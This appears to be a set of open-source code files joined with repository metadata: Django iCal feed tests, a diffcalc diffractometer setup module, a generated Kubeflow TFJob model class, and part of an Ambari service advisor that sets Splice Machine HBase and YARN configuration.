calendar.subcomponents[0]["ATTENDEE"][1].params.to_ical(),
b'CN="Jane Attender";CUTYPE=INDIVIDUAL;PARTSTAT=ACCEPTED;ROLE=REQ-PARTICIPANT;RSVP=TRUE',
)
self.assertEquals(
calendar.subcomponents[0]["ATTENDEE"][2].to_ical(),
b"MAILTO:[email protected]",
)
self.assertEquals(
calendar.subcomponents[0]["ATTENDEE"][2].params.to_ical(),
b'CN="Dan Decliner";CUTYPE=INDIVIDUAL;PARTSTAT=DECLINED;ROLE=REQ-PARTICIPANT;RSVP=TRUE',
)
self.assertEquals(
calendar.subcomponents[0]["ATTENDEE"][3].to_ical(),
b"MAILTO:[email protected]",
)
self.assertEquals(
calendar.subcomponents[0]["ATTENDEE"][3].params.to_ical(),
b'CN="Mary Maybe";CUTYPE=INDIVIDUAL;PARTSTAT=TENTATIVE;ROLE=REQ-PARTICIPANT;RSVP=TRUE',
)
self.assertEquals(
calendar.subcomponents[0]["RRULE"][0].to_ical(), b"FREQ=DAILY;BYHOUR=10"
)
self.assertEquals(
calendar.subcomponents[0]["RRULE"][1].to_ical(),
b"FREQ=MONTHLY;BYMONTHDAY=4",
)
self.assertEquals(
calendar.subcomponents[0]["EXRULE"][0].to_ical(),
b"FREQ=MONTHLY;BYMONTHDAY=-4",
)
self.assertEquals(
calendar.subcomponents[0]["EXRULE"][1].to_ical(), b"FREQ=MONTHLY;BYDAY=+3TU"
)
self.assertEquals(
calendar.subcomponents[0]["RDATE"].to_ical(), b"19990902,19980101"
)
self.assertEquals(
calendar.subcomponents[0]["EXDATE"].to_ical(), b"19990801,19980201"
)
self.assertEquals(calendar.subcomponents[1]["SUMMARY"], "Title2")
self.assertEquals(calendar.subcomponents[1]["DESCRIPTION"], "Description2")
self.assertTrue(calendar.subcomponents[1]["URL"].endswith("/event/2"))
self.assertEquals(
calendar.subcomponents[1]["DTSTART"].to_ical(), b"20120506T180000"
)
self.assertEquals(
calendar.subcomponents[1]["DTEND"].to_ical(), b"20120506T200000"
)
self.assertEquals(
calendar.subcomponents[1]["RRULE"].to_ical(),
b"FREQ=WEEKLY;BYDAY=MO,TU,WE,TH,FR",
)
self.assertEquals(
calendar.subcomponents[1]["EXRULE"].to_ical(), b"FREQ=MONTHLY;BYDAY=-3TU"
)
self.assertEquals(calendar.subcomponents[1]["RDATE"].to_ical(), b"19970902")
self.assertEquals(calendar.subcomponents[1]["EXDATE"].to_ical(), b"19970801")
self.assertEquals(
calendar.subcomponents[1]["GEO"].to_ical(), "37.386013;-122.082932"
)
self.assertEquals(
calendar.subcomponents[1]["LAST-MODIFIED"].to_ical(), b"20120507T100000Z"
)
self.assertEquals(
calendar.subcomponents[1]["ORGANIZER"].to_ical(),
b"MAILTO:[email protected]",
)
def test_wr_timezone(self):
"""
Test for the x-wr-timezone property.
"""
class TestTimezoneFeed(TestICalFeed):
timezone = "Asia/Tokyo"
request = RequestFactory().get("/test/ical")
view = TestTimezoneFeed()
response = view(request)
calendar = icalendar.Calendar.from_ical(response.content)
self.assertEquals(calendar["X-WR-TIMEZONE"], "Asia/Tokyo")
def test_timezone(self):
tokyo = pytz.timezone("Asia/Tokyo")
us_eastern = pytz.timezone("US/Eastern")
class TestTimezoneFeed(TestItemsFeed):
def items(self):
return [
{
"title": "Title1",
"description": "Description1",
"link": "/event/1",
"start": datetime(2012, 5, 1, 18, 00, tzinfo=tokyo),
"end": datetime(2012, 5, 1, 20, 00, tzinfo=tokyo),
"recurrences": {
"rrules": [],
"xrules": [],
"rdates": [],
"xdates": [],
},
},
{
"title": "Title2",
"description": "Description2",
"link": "/event/2",
"start": datetime(2012, 5, 6, 18, 00, tzinfo=us_eastern),
"end": datetime(2012, 5, 6, 20, 00, tzinfo=us_eastern),
"recurrences": {
"rrules": [],
"xrules": [],
"rdates": [],
"xdates": [],
},
},
]
request = RequestFactory().get("/test/ical")
view = TestTimezoneFeed()
response = view(request)
calendar = icalendar.Calendar.from_ical(response.content)
self.assertEquals(len(calendar.subcomponents), 2)
self.assertEquals(
calendar.subcomponents[0]["DTSTART"].to_ical(), b"20120501T180000"
)
self.assertEquals(
calendar.subcomponents[0]["DTSTART"].params["TZID"], "Asia/Tokyo"
)
self.assertEquals(
calendar.subcomponents[0]["DTEND"].to_ical(), b"20120501T200000"
)
self.assertEquals(
calendar.subcomponents[0]["DTEND"].params["TZID"], "Asia/Tokyo"
)
self.assertEquals(
calendar.subcomponents[1]["DTSTART"].to_ical(), b"20120506T180000"
)
self.assertEquals(
calendar.subcomponents[1]["DTSTART"].params["TZID"], "US/Eastern"
)
self.assertEquals(
calendar.subcomponents[1]["DTEND"].to_ical(), b"20120506T200000"
)
self.assertEquals(
calendar.subcomponents[1]["DTEND"].params["TZID"], "US/Eastern"
)
def test_file_name(self):
request = RequestFactory().get("/test/ical")
view = TestFilenameFeed()
response = view(request)
self.assertIn("Content-Disposition", response)
self.assertEqual(
response["content-disposition"], 'attachment; filename="123.ics"'
)
def test_file_type(self):
request = RequestFactory().get("/test/ical")
view = TestFilenameFeed()
response = view(request)
self.assertIn("Content-Type", response)
self.assertEqual(
response["content-type"],
"text/calendar, text/x-vcalendar, application/hbs-vcs",
)
def test_file_header(self):
request = RequestFactory().get("/test/ical")
view = TestFilenameFeed()
response = view(request)
header = b"BEGIN:VCALENDAR\r\nVERSION:2.0"
self.assertTrue(response.content.startswith(header))
| mit | -4,178,158,778,942,191,000 | 35.898585 | 119 | 0.52496 | false |
DiamondLightSource/diffcalc | diffcalc/gdasupport/you.py | 1 | 4367 | from diffcalc.gdasupport.scannable.diffractometer import DiffractometerScannableGroup
from diffcalc.gdasupport.scannable.hkl import Hkl
from diffcalc.gdasupport.scannable.hkloffset import HklOffset
from diffcalc.gdasupport.scannable.simulation import SimulatedCrystalCounter
from diffcalc.gdasupport.scannable.wavelength import Wavelength
from diffcalc.gdasupport.scannable.parameter import DiffractionCalculatorParameter
from diffcalc.dc import dcyou as _dc
from diffcalc.dc.help import format_command_help
from diffcalc.gdasupport.scannable.sr2 import Sr2
from diffcalc.gdasupport.scannable.qtrans import Qtrans
reload(_dc)
from diffcalc.dc.dcyou import * # @UnusedWildImport
from diffcalc import settings
try:
import gda # @UnusedImport @UnresolvedImport
GDA = True
except:
GDA = False
if not GDA:
from diffcalc.gdasupport.minigda import command
_pos = command.Pos()
_scan = command.Scan(command.ScanDataPrinter())
def pos(*args):
"""
        pos                  show position of all Scannables
        pos scn              show position of scn
        pos scn target       move scn to target (a number)
"""
return _pos(*args)
def scan(*args):
"""
scan scn start stop step {scn {target}} {det t}
"""
return _scan(*args)
from diffcalc.gdasupport.scannable.sim import sim # @UnusedImport
_scn_group = settings.axes_scannable_group
_diff_scn_name = settings.geometry.name # @UndefinedVariable
_energy_scannable = settings.energy_scannable
# Create diffractometer scannable
_diff_scn = DiffractometerScannableGroup(_diff_scn_name, _dc, _scn_group)
globals()[_diff_scn_name] = _diff_scn
# Create hkl scannables
hkl = Hkl('hkl', _scn_group, _dc)
h = hkl.h
k = hkl.k
l = hkl.l
hkloffset = HklOffset('hkloffset', _scn_group, _dc)
h_offset = hkloffset.h
k_offset = hkloffset.k
l_offset = hkloffset.l
pol_offset = hkloffset.polar
az_offset = hkloffset.azimuthal
sr2 = Sr2('sr2', _scn_group, _dc)
qtrans = Qtrans('qtrans', _scn_group, _dc)
Hkl.dynamic_docstring = format_command_help(hkl_commands_for_help) # must be on the class
ub.__doc__ = format_command_help(ub_commands_for_help)
if settings.include_reference:
_virtual_angles = ('theta', 'ttheta', 'qaz', 'alpha', 'naz', 'tau', 'psi', 'beta', 'betain', 'betaout')
else:
_virtual_angles = ('theta', 'ttheta', 'qaz', 'betain', 'betaout')
hklverbose = Hkl('hklverbose', _scn_group, _dc, _virtual_angles)
# Create wavelength scannable
wl = Wavelength(
'wl', _energy_scannable, settings.energy_scannable_multiplier_to_get_KeV)
if not GDA:
wl.asynchronousMoveTo(1) # Angstrom
_energy_scannable.level = 3
wl.level = 3
# Create simulated counter timer
ct = SimulatedCrystalCounter('ct', _scn_group, settings.geometry, wl)
ct.level = 10
# Create constraint scannables
def _create_constraint_scannable(con_name, scn_name=None):
if not scn_name:
scn_name = con_name
return DiffractionCalculatorParameter(
scn_name, con_name, _dc.constraint_manager)
# Detector constraints
def isconstrainable(name):
return not constraint_manager.is_constraint_fixed(name)
if isconstrainable('delta'): delta_con = _create_constraint_scannable('delta', 'delta_con')
if isconstrainable('gam'): gam_con = _create_constraint_scannable('gam', 'gam_con')
if isconstrainable('qaz'): qaz = _create_constraint_scannable('qaz')
if isconstrainable('naz'): naz = _create_constraint_scannable('naz')
# Reference constraints
if settings.include_reference:
alpha = _create_constraint_scannable('alpha')
beta = _create_constraint_scannable('beta')
psi = _create_constraint_scannable('psi')
a_eq_b = 'a_eq_b'
betain = _create_constraint_scannable('betain')
betaout = _create_constraint_scannable('betaout')
bin_eq_bout = 'bin_eq_bout'
# Sample constraints
if isconstrainable('mu'): mu_con = _create_constraint_scannable('mu', 'mu_con')
if isconstrainable('eta'): eta_con = _create_constraint_scannable('eta', 'eta_con')
if isconstrainable('chi'): chi_con = _create_constraint_scannable('chi', 'chi_con')
if isconstrainable('phi'): phi_con = _create_constraint_scannable('phi', 'phi_con')
if isconstrainable('mu') and isconstrainable('gam'): mu_is_gam = 'mu_is_gam'
omega = _create_constraint_scannable('omega')
bisect = 'bisect'
# Cleanup other cruft
del format_command_help
| gpl-3.0 | -3,793,663,831,858,863,000 | 32.083333 | 107 | 0.715365 | false |
kubeflow/tf-operator | sdk/python/kubeflow/tfjob/models/v1_tf_job.py | 1 | 7910 | # Copyright 2019 kubeflow.org.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
"""
tfjob
Python SDK for TF-Operator # noqa: E501
OpenAPI spec version: v0.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from kubernetes.client import V1ObjectMeta # noqa: F401,E501
from kubeflow.tfjob.models.v1_job_status import V1JobStatus # noqa: F401,E501
from kubeflow.tfjob.models.v1_tf_job_spec import V1TFJobSpec # noqa: F401,E501
class V1TFJob(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'api_version': 'str',
'kind': 'str',
'metadata': 'V1ObjectMeta',
'spec': 'V1TFJobSpec',
'status': 'V1JobStatus'
}
attribute_map = {
'api_version': 'apiVersion',
'kind': 'kind',
'metadata': 'metadata',
'spec': 'spec',
'status': 'status'
}
def __init__(self, api_version=None, kind=None, metadata=None, spec=None, status=None): # noqa: E501
"""V1TFJob - a model defined in Swagger""" # noqa: E501
self._api_version = None
self._kind = None
self._metadata = None
self._spec = None
self._status = None
self.discriminator = None
if api_version is not None:
self.api_version = api_version
if kind is not None:
self.kind = kind
if metadata is not None:
self.metadata = metadata
if spec is not None:
self.spec = spec
if status is not None:
self.status = status
@property
def api_version(self):
"""Gets the api_version of this V1TFJob. # noqa: E501
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources # noqa: E501
:return: The api_version of this V1TFJob. # noqa: E501
:rtype: str
"""
return self._api_version
@api_version.setter
def api_version(self, api_version):
"""Sets the api_version of this V1TFJob.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources # noqa: E501
:param api_version: The api_version of this V1TFJob. # noqa: E501
:type: str
"""
self._api_version = api_version
@property
def kind(self):
"""Gets the kind of this V1TFJob. # noqa: E501
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds # noqa: E501
:return: The kind of this V1TFJob. # noqa: E501
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""Sets the kind of this V1TFJob.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds # noqa: E501
:param kind: The kind of this V1TFJob. # noqa: E501
:type: str
"""
self._kind = kind
@property
def metadata(self):
"""Gets the metadata of this V1TFJob. # noqa: E501
Standard Kubernetes object's metadata. # noqa: E501
:return: The metadata of this V1TFJob. # noqa: E501
:rtype: V1ObjectMeta
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""Sets the metadata of this V1TFJob.
Standard Kubernetes object's metadata. # noqa: E501
:param metadata: The metadata of this V1TFJob. # noqa: E501
:type: V1ObjectMeta
"""
self._metadata = metadata
@property
def spec(self):
"""Gets the spec of this V1TFJob. # noqa: E501
Specification of the desired state of the TFJob. # noqa: E501
:return: The spec of this V1TFJob. # noqa: E501
:rtype: V1TFJobSpec
"""
return self._spec
@spec.setter
def spec(self, spec):
"""Sets the spec of this V1TFJob.
Specification of the desired state of the TFJob. # noqa: E501
:param spec: The spec of this V1TFJob. # noqa: E501
:type: V1TFJobSpec
"""
self._spec = spec
@property
def status(self):
"""Gets the status of this V1TFJob. # noqa: E501
Most recently observed status of the TFJob. Read-only (modified by the system). # noqa: E501
:return: The status of this V1TFJob. # noqa: E501
:rtype: V1JobStatus
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this V1TFJob.
Most recently observed status of the TFJob. Read-only (modified by the system). # noqa: E501
:param status: The status of this V1TFJob. # noqa: E501
:type: V1JobStatus
"""
self._status = status
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(V1TFJob, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1TFJob):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
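# Minimal construction sketch (added for illustration; not part of the generated
# client). The name, namespace, and apiVersion values below are arbitrary examples.
def _example_tfjob():
    """Build a V1TFJob with only the common top-level fields populated."""
    return V1TFJob(
        api_version="kubeflow.org/v1",
        kind="TFJob",
        metadata=V1ObjectMeta(name="example-tfjob", namespace="default"))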
| apache-2.0 | 2,290,367,220,663,842,300 | 31.024291 | 295 | 0.604172 | false |
Mossman1215/pgp-backup | upload_dir_instructions.py | 1 | 2112 | import os,sys,json,random
class uploadTest:
def __init__(self):
self.source = sys.argv[1]
self.f = open("operations.txt",'w',1)
self.counter = 0
print('running')
self.mapping = dict()
def getParentID(self,filename):
#search the dictionary for the filename
if(filename in self.mapping):
return self.mapping[filename]
else:
return -1
def getNewID(self):
self.counter += 1
return self.counter
def getRandomID(self):
return random.randrange(0,1000,1)
def run(self):
print(self.number_of_operations())
for root,subdirs,files in os.walk(self.source, topdown=True):
#store the root id
title = os.path.basename(root)
identifier = self.getNewID()
pID = self.getParentID(title)
if(pID == -1):
pID = self.getRandomID()
self.f.write(title+','+str(identifier)+','+str(pID)+'\n')
for subdir in subdirs:
subName = os.path.basename(subdir)
self.mapping[subName] = identifier
for fi in files:
filefolder = os.path.basename(fi)
fileID = self.getRandomID()
self.f.write(filefolder+','+str(fileID)+','+str(identifier)+'\n')
self.f.write('\n')
print('complete')
self.f.close()
def number_of_operations(self):
count = 0
for root,subdirs,files in os.walk(self.source, topdown=True):
count+=1
count= count + len(files)
return count
if(__name__ == '__main__'):
var = uploadTest()
var.run()
| mit | -2,677,422,769,158,516,000 | 43 | 97 | 0.432292 | false |
Fe-Nik-S/Examples | python/external_api/Sencore/lib/const.py | 1 | 4426 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from collections import namedtuple
path_attr = namedtuple("path_attr", ("PATH", "ATTR"))
__ALL__ = ["SENCORE_URLS_ENUM", "SENCORE_DATA_PATH", "SENCORE_ATTRS_ENUM", "RESULT_PATH"]
class SENCORE_URLS_ENUM(object):
ETH = "http://{address}/probe/ethdata"
ETR_ALL = "http://{address}/probe/etrdata?&&"
ETR = "http://{address}/probe/etrdata?inputId={input_id}&tuningSetupId={ts_index}"
GENERAL = "http://{address}/probe/generaldata?&&"
STATUS = "http://{address}/probe/status"
REFERENCE_BASE_URL = "https://mgmt.hq.ertelecom.ru/chtp/api/dir/%7B%22rec_type_id%22:2020%7D"
TDT_TIME = "http://{address}/probe/data/AnaParseTable?inputId=1&etrEngineNo=0&pid=0&tid=112&tidExtension=-1"
QAM_TIME = "http://{address}/probe/data/AnaParseTable?inputId=1&etrEngineNo=0&pid=20&tid=112&tidExtension=-1"
ETH_TIME = "http://{address}/probe/data/AnaParseTable?inputId=100&etrEngineNo=0&pid=20&tid=112&tidExtension=-1"
class SENCORE_ATTRS_ENUM(object):
ETH = ("bitrate", "name", "index", "cc_errors", "net_bitrate", "iat_avg")
REQUIRED_PIDS = {"0", "1", "16", "17", "18", "20", "89", "99"}
class SENCORE_DATA_PATH(object):
ETH_TSS = path_attr(**{
"PATH": "EthExportData,streams,mon",
"ATTR": ("bitrate", "name", "index", "cc_errors",
"net_bitrate", "iat_avg", "dst_addr")
})
ETR_PIDS = path_attr(**{
"PATH": "Etr290ExportData,input,tuningSetup,pidList,pid",
"ATTR": ("id", "bitrate", ("max_bitrate", "maxBitrate"),
("min_bitrate", "minBitrate"), ("num_cc_errors", "numCcErrors"), "scrambled")
})
ETR_SERVICES = path_attr(**{
"PATH": "Etr290ExportData,input,tuningSetup,serviceList,service",
"ATTR": ("id", "name", "bitrate", "scrambled", "symbolrate")
})
ETR_CHECKS = path_attr(**{
"PATH": "Etr290ExportData,input,tuningSetup,etrList,group",
"ATTR": ()
})
GENERAL_VERSION = path_attr(**{
"PATH": "GeneralProbeExportData,release",
"ATTR": "version"
})
GENERAL_UPTIME = path_attr(**{
"PATH": "GeneralProbeExportData,internet,mgmt,mib2,system,sysUpTime",
"ATTR": "uptime"
})
GENERAL_MLERROR = path_attr(**{
"PATH": ("GeneralProbeExportData,internet,private,"
"enterprise,bridgetech,mlrerrTable,row"),
"ATTR": ("mlrerr1m", )
})
GENERAL_MW = path_attr(**{
"PATH": ("GeneralProbeExportData,internet,private,"
"enterprise,bridgetech,mwTable,row"),
"ATTR": ("iatPeak1m", "mlrSum1m")
})
GENERAL_CHANNEL = path_attr(**{
"PATH": ("GeneralProbeExportData,internet,private,"
"enterprise,bridgetech,channelTable,row"),
"ATTR": ("chindex", )
})
STATUS_TIME = path_attr(**{
"PATH": "Status,System,time",
"ATTR": "time"
})
STATUS_CPU_TEMP = path_attr(**{
"PATH": "Status,System,cpu_temp",
"ATTR": "cpu_temp"
})
STATUS_FREE_MEM = path_attr(**{
"PATH": "Status,Resources,ram_free",
"ATTR": "free_mem"
})
STATUS_FREE_DISC = path_attr(**{
"PATH": "Status,Resources,disk_free",
"ATTR": "free_disc"
})
STATUS_PORT = "Status,Interfaces,Fixed,Data,status"
ETR_INPUTS = path_attr(**{
"PATH": "Etr290ExportData,input",
"ATTR": (("current_bitrate", "effectiveBitrate"),
("min_signal_level", "minSignalLevel"),
("max_signal_level", "maxSignalLevel"),
("max_centre_frequency_offset", "maxCentreFrequencyOffset"),
("max_current_bitrate", "maximumEffectiveBitrate"), "id",
"name", "description", "symbolrate", "minSnr", "minMer",
("symbolrate_offset", "maxSymbolRateOffset")
)
})
TEMP_PATH = "/tmp/send2zabbix/"
AUTODISCOVERY_SEND_PERIOD = 12
AUTODISCOVERY_SEND_TIMESTAMP = "timestamp"
TIMEOUT = 900
URL_REQUEST_TIMEOUT = 10
TIME_SERVER = ''
ZABBIX_HOST = ""
ZABBIX_PORT = "10051"
DATETIME_FORMAT = "%Y-%m-%d %H:%M:%S"
| mit | -8,902,507,808,757,745,000 | 33.310078 | 115 | 0.584049 | false |
splicemachine/spliceengine | assembly/hdp3.1.0/src/main/resources/common-services/SPLICEMACHINE/2.5.1/service_advisor.py | 1 | 16882 | #!/usr/bin/env ambari-python-wrap
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import imp
import math
import os
import re
import socket
import traceback
import glob
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
STACKS_DIR = os.path.join(SCRIPT_DIR, '../../../stacks/')
PARENT_FILE = os.path.join(STACKS_DIR, 'service_advisor.py')
try:
with open(PARENT_FILE, 'rb') as fp:
service_advisor = imp.load_module('service_advisor', fp, PARENT_FILE, ('.py', 'rb', imp.PY_SOURCE))
except Exception as e:
traceback.print_exc()
print "Failed to load parent"
class SPLICEMACHINE251ServiceAdvisor(service_advisor.ServiceAdvisor):
def __init__(self, *args, **kwargs):
self.as_super = super(SPLICEMACHINE251ServiceAdvisor, self)
self.as_super.__init__(*args, **kwargs)
def colocateService(self, hostsComponentsMap, serviceComponents):
pass
def getServiceComponentLayoutValidations(self, services, hosts):
print "getServiceComponentLayoutValidations"
return []
def getServiceConfigurationRecommendations(self, configurations, clusterData, services, hosts):
#Update HBase Classpath
print "getServiceConfigurationRecommendations",services
if "hbase-env" in services["configurations"]:
hbase_env = services["configurations"]["hbase-env"]["properties"]
if "content" in hbase_env:
content = hbase_env["content"]
HBASE_CLASSPATH_PREFIX = "export HBASE_CLASSPATH_PREFIX=/var/lib/splicemachine/*:/usr/hdp/3.1.0.0-78/spark2/jars/*:/usr/hdp/3.1.0.0-78/hadoop/lib/ranger-hdfs-plugin-impl/*:/usr/hdp/3.1.0.0-78/hbase/lib/atlas-hbase-plugin-impl/kafka*"
HBASE_MASTER_OPTS = "export HBASE_MASTER_OPTS=\"${HBASE_MASTER_OPTS} -D"+ " -D".join(self.getMasterDashDProperties()) + "\""
HBASE_REGIONSERVER_OPTS = "export HBASE_REGIONSERVER_OPTS=\"${HBASE_REGIONSERVER_OPTS} -D"+ " -D".join(self.getRegionServerDashDProperties()) + "\""
HBASE_CONF_DIR = "export HBASE_CONF_DIR=${HBASE_CONF_DIR}:/etc/splicemachine/conf/"
if "splicemachine" not in content:
print "Updating Hbase Env Items"
HBASE_CLASSPATH_PREFIX = "#Add Splice Jars to HBASE_PREFIX_CLASSPATH\n" + HBASE_CLASSPATH_PREFIX
HBASE_MASTER_OPTS = "#Add Splice Specific Information to HBase Master\n" + HBASE_MASTER_OPTS
HBASE_REGIONSERVER_OPTS = "#Add Splice Specific Information to Region Server\n" + HBASE_REGIONSERVER_OPTS
HBASE_CONF_DIR = "#Add Splice Specific Information to Region Server\n" + HBASE_CONF_DIR
content = "\n\n".join((content, HBASE_CLASSPATH_PREFIX))
content = "\n\n".join((content, HBASE_MASTER_OPTS))
content = "\n\n".join((content, HBASE_REGIONSERVER_OPTS))
content = "\n\n".join((content, HBASE_CONF_DIR))
print "content: " + content
putHbaseEnvProperty = self.putProperty(configurations, "hbase-env", services)
putHbaseEnvProperty("content", content)
# Update HDFS properties in core-site
if "core-site" in services["configurations"]:
core_site = services["configurations"]["core-site"]["properties"]
putCoreSiteProperty = self.putProperty(configurations, "core-site", services)
for property, desired_value in self.getCoreSiteDesiredValues().iteritems():
if property not in core_site or core_site[property] != desired_value:
putCoreSiteProperty(property, desired_value)
# Update hbase-site properties in hbase-site
if "hbase-site" in services["configurations"]:
hbase_site = services["configurations"]["hbase-site"]["properties"]
putHbaseSitePropertyAttributes = self.putPropertyAttribute(configurations, "hbase-site")
putHBaseSiteProperty = self.putProperty(configurations, "hbase-site", services)
for property, desired_value in self.getHBaseSiteDesiredValues().iteritems():
if property not in hbase_site or hbase_site[property] != desired_value:
putHBaseSiteProperty(property, desired_value)
# Update hbase-site properties in hbase-site
if "yarn-site" in services["configurations"]:
yarn_site = services["configurations"]["yarn-site"]["properties"]
putYarnSitePropertyAttributes = self.putPropertyAttribute(configurations, "yarn-site")
putYarnSiteProperty = self.putProperty(configurations, "yarn-site", services)
for property, desired_value in self.getYarnSiteDesiredValues().iteritems():
if property not in yarn_site or yarn_site[property] != desired_value:
putYarnSiteProperty(property, desired_value)
#update zookeeper configs
if 'zoo.cfg' in services['configurations']:
zoo_cfg = services['configurations']['zoo.cfg']["properties"]
print(zoo_cfg),zoo_cfg
putZooProperty = self.putProperty(configurations, "zoo.cfg", services)
putZooProperty('maxClientCnxns',0)
putZooProperty('maxSessionTimeout',120000)
def getServiceConfigurationsValidationItems(self, configurations, recommendedDefaults, services, hosts):
print "getServiceConfigurationsValidationItems"
return []
# print "getServiceConfigurationsValidationItems"
# validate recommended properties in core-site
# siteName = "core-site"
# method = self.validateCoreSiteConfigurations
# items = self.validateConfigurationsForSite(configurations, recommendedDefaults, services, hosts, siteName, method)
# siteName = "hdfs-site"
# method = self.validateHDFSSiteConfigurations
# resultItems = self.validateConfigurationsForSite(configurations, recommendedDefaults, services, hosts, siteName, method)
# items.extend(resultItems)
# siteName = "hbase-site"
# method = self.validateHBaseSiteConfigurations
# resultItems = self.validateConfigurationsForSite(configurations, recommendedDefaults, services, hosts, siteName, method)
# items.extend(resultItems)
def validateCoreSiteConfigurations(self, properties, recommendedDefaults, configurations, services, hosts):
print "validateCoreSiteConfigurations"
core_site = properties
validationItems = []
for property, desired_value in self.getCoreSiteDesiredValues().iteritems():
if property not in core_site or core_site[property] != desired_value:
message = "Splice Machine requires this property to be set to the recommended value of " + desired_value
validationItems.append({"config-name": property, "item": self.getWarnItem(message)})
return self.toConfigurationValidationProblems(validationItems, "core-site")
def validateHDFSSiteConfigurations(self, properties, recommendedDefaults, configurations, services, hosts):
print "validateHDFSSiteConfigurations"
hdfs_site = properties
validationItems = []
for property, desired_value in self.getHDFSSiteDesiredValues().iteritems():
if property not in hdfs_site or hdfs_site[property] != desired_value:
message = "Splice Machine requires this property to be set to the recommended value of " + desired_value
validationItems.append({"config-name": property, "item": self.getWarnItem(message)})
return self.toConfigurationValidationProblems(validationItems, "hdfs-site")
def validateHBaseSiteConfigurations(self, properties, recommendedDefaults, configurations, services, hosts):
print "validateHBaseSiteConfigurations"
hbase_site = properties
validationItems = []
for property, desired_value in self.getHBaseSiteDesiredValues().iteritems():
print "->" + property + ":" + desired_value + ":" + hbase_site[property]
if property not in hbase_site or hbase_site[property] != desired_value:
message = "Splice Machine requires this property to be set to the recommended value of " + desired_value
validationItems.append({"config-name": property, "item": self.getWarnItem(message)})
return self.toConfigurationValidationProblems(validationItems, "hbase-site")
def getCoreSiteDesiredValues(self):
core_site_desired_values = {
"ipc.server.listen.queue.size" : "3300"
}
return core_site_desired_values
def getHDFSSiteDesiredValues(self):
hdfs_site_desired_values = {
"dfs.datanode.handler.count" : "20",
"dfs.client.read.shortcircuit.buffer.size" : "131072",
}
return hdfs_site_desired_values
def getYarnSiteDesiredValues(self):
yarn_site_desired_values = {
"hdp.version" : "3.1.0.0-78"
}
return yarn_site_desired_values
def getHBaseSiteDesiredValues(self):
hbase_site_desired_values = {
"hbase.coprocessor.master.classes" : "com.splicemachine.hbase.SpliceMasterObserver",
"hbase.regionserver.global.memstore.size" : "0.25",
"hfile.block.cache.size" : "0.25",
"hbase.regionserver.handler.count" : "200",
"hbase.client.scanner.caching" : "1000",
"hbase.hstore.blockingStoreFiles" : "20",
"hbase.hstore.compactionThreshold" : "5",
"hbase.balancer.period" : "60000",
"hbase.client.ipc.pool.size" : "10",
"hbase.client.max.perregion.tasks" : "100",
"hbase.coprocessor.regionserver.classes" : "com.splicemachine.hbase.RegionServerLifecycleObserver,com.splicemachine.hbase.SpliceRSRpcServices",
"hbase.hstore.compaction.min.size" : "136314880",
"hbase.hstore.compaction.min" : "3",
"hbase.hstore.defaultengine.compactionpolicy.class" : "com.splicemachine.compactions.SpliceDefaultCompactionPolicy",
"hbase.hstore.defaultengine.compactor.class" : "com.splicemachine.compactions.SpliceDefaultCompactor",
"hbase.hstore.defaultengine.storeflusher.class" : "com.splicemachine.compactions.SpliceDefaultFlusher",
"hbase.coprocessor.region.classes" : "org.apache.hadoop.hbase.security.access.SecureBulkLoadEndpoint,com.splicemachine.hbase.MemstoreAwareObserver,com.splicemachine.derby.hbase.SpliceIndexObserver,com.splicemachine.derby.hbase.SpliceIndexEndpoint,com.splicemachine.hbase.RegionSizeEndpoint,com.splicemachine.si.data.hbase.coprocessor.TxnLifecycleEndpoint,com.splicemachine.si.data.hbase.coprocessor.SIObserver,com.splicemachine.hbase.BackupEndpointObserver",
"hbase.htable.threads.max" : "96",
"hbase.ipc.warn.response.size" : "-1",
